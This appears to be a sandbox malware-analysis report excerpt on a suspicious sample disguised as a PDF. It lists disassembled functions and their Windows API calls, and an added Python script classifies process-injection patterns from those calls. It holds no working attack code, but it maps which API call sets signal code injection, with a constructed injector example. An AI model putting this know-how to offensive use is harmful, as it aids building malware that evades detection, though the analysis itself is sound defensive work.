                              • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                              • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                              • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 00478442
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                              • CoUninitialize.OLE32 ref: 0047863C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                              • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                              APIs
                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                              • String ID: @
                              • API String ID: 4150878124-2766056989
                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$]$h
                              • API String ID: 4104443479-3262404753
                              • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                              • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                              APIs
                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • CloseHandle.KERNEL32(?), ref: 00457E09
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                              • String ID: <$@
                              • API String ID: 2417854910-1426351568
                              • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                              • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                              APIs
                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                              • String ID:
                              • API String ID: 3705125965-3916222277
                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
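                               The two function blocks above (the OpenProcess / VirtualAllocEx / WriteProcessMemory / ReadProcessMemory group reached from 004343AD with its SendMessageW calls at 004365EF and 0043665F, and the InternetOpenUrlW / HttpSendRequestW / HttpQueryInfoW routine at 0044A87A) only become readable once the raw immediates are named: 00000438 is PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, 00001000/00000004 are MEM_COMMIT and PAGE_READWRITE, 00001104 and 00001111 are TVM_GETITEMRECT and TVM_HITTEST (TV_FIRST = 0x1100), and HttpQueryInfoW level 00000005 is HTTP_QUERY_CONTENT_LENGTH. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the report's "APIs" bullet lines, decodes those constants and separates a read/write buffer used to marshal a TreeView message into the window's owning process (which Windows does not do for those pointer-carrying messages) from an injection pattern with an executable allocation or a thread-start primitive. SAMPLE is copied from the blocks above; INJECTOR_SAMPLE and its addresses are constructed to exercise the other branch and do not come from this sample. The verdict covers only the lines it is given; the report's "Queues an APC" and "Modifies the context of a thread" signatures are raised on other functions that are not shown here.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: "APIs" bullet lines copied from the report's function blocks above.
SAMPLE = """\
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
• GetMenuItemInfoW.USER32 ref: 0045FAC4
"""

# Hypothetical call set (values and addresses constructed, NOT from this report) of a classic injector.
INJECTOR_SAMPLE = """\
• OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00401000
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00401010
• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00401020
• CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 00401030
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list             # int for an immediate the disassembler recovered, None for "?"
    ref: int               # call-site address
    caller: Optional[int]  # enclosing subcall function, when the line is nested under one

def parse_api_lines(text: str) -> list:
    """Turn the report's bullet lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        args = [None if a == "?" else int(a, 16) for a in raw]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                             int(m.group("caller"), 16) if m.group("caller") else None))
    return calls

# Windows SDK values for the immediates that appear in the report.
PROCESS_RIGHTS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
                  0x80: "PROCESS_CREATE_PROCESS", 0x400: "PROCESS_QUERY_INFORMATION", 0x800: "PROCESS_SUSPEND_RESUME"}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x4: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
PAGE_EXECUTE_MASK = 0xF0   # PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
TREEVIEW_MSGS = {0x1100 + 4: "TVM_GETITEMRECT", 0x1100 + 17: "TVM_HITTEST"}   # TV_FIRST = 0x1100
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}
THREAD_START_APIS = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread", "QueueUserAPC", "SetThreadContext"}

def flags(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    return "|".join(names + ([hex(leftover)] if leftover else [])) or "0"

def decode(call: ApiCall) -> str:
    """Render one call with its recovered immediates named."""
    a = call.args
    known = lambda i: len(a) > i and a[i] is not None
    if call.api == "OpenProcess" and known(0):
        return f"OpenProcess(dwDesiredAccess={flags(a[0], PROCESS_RIGHTS)})"
    if call.api == "VirtualAllocEx" and known(3) and known(4):
        return f"VirtualAllocEx(flAllocationType={flags(a[3], MEM_FLAGS)}, flProtect={PAGE_PROTECT.get(a[4], hex(a[4]))})"
    if call.api == "SendMessageW" and known(1):
        return f"SendMessageW(Msg={TREEVIEW_MSGS.get(a[1], hex(a[1]))})"
    if call.api == "HttpQueryInfoW" and known(1):
        return f"HttpQueryInfoW(dwInfoLevel={HTTP_QUERY.get(a[1], hex(a[1]))})"
    return f"{call.api}({', '.join('?' if x is None else hex(x) for x in a)})"

def triage(calls: list) -> dict:
    """Classify what this call set can do to another process, judged from these lines only."""
    names = {c.api for c in calls}
    cross_proc = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"} <= names
    exec_alloc = any(c.api == "VirtualAllocEx" and len(c.args) > 4 and c.args[4] is not None
                     and c.args[4] & PAGE_EXECUTE_MASK for c in calls)
    thread_start = bool(names & THREAD_START_APIS)
    treeview = any(c.api == "SendMessageW" and len(c.args) > 1 and c.args[1] in TREEVIEW_MSGS for c in calls)
    if cross_proc and (exec_alloc or thread_start):
        verdict = "code injection: executable remote allocation and/or a thread-start primitive"
    elif cross_proc:
        # TVM_GETITEMRECT/TVM_HITTEST carry a pointer that is not marshalled across processes,
        # so a RW buffer allocated in the window's owning process is the expected pattern.
        verdict = "cross-process RW buffer only" + (" (TreeView message marshalling)" if treeview else "")
    else:
        verdict = "no cross-process memory access"
    return {"cross_process_rw": cross_proc, "executable_allocation": exec_alloc,
            "thread_start_primitive": thread_start, "treeview_messages": treeview, "verdict": verdict}

if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        print(f"{c.ref:08X} {decode(c)}")
    print(triage(parse_api_lines(SAMPLE))["verdict"])
```

                               Run it as is to see the decoded lines and the verdict; to triage another block from the report, paste its "APIs" lines into SAMPLE. The check is deliberately narrow: a function that only reads and writes a PAGE_READWRITE buffer around TreeView messages is what a ControlTreeView-style helper looks like, while a PAGE_EXECUTE_* allocation or any thread-start API in the same call set moves the verdict to injection.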
                              APIs
                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem
                              • String ID: 0
                              • API String ID: 135850232-4108050209
                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Library$AddressFreeLoadProc
                              • String ID: AU3_GetPluginDetails
                              • API String ID: 145871493-4132174516
                              • Opcode ID: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                              • Opcode Fuzzy Hash: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: msctls_updown32
                              • API String ID: 3375834691-2298589950
                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: $<
                              • API String ID: 4104443479-428540627
                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
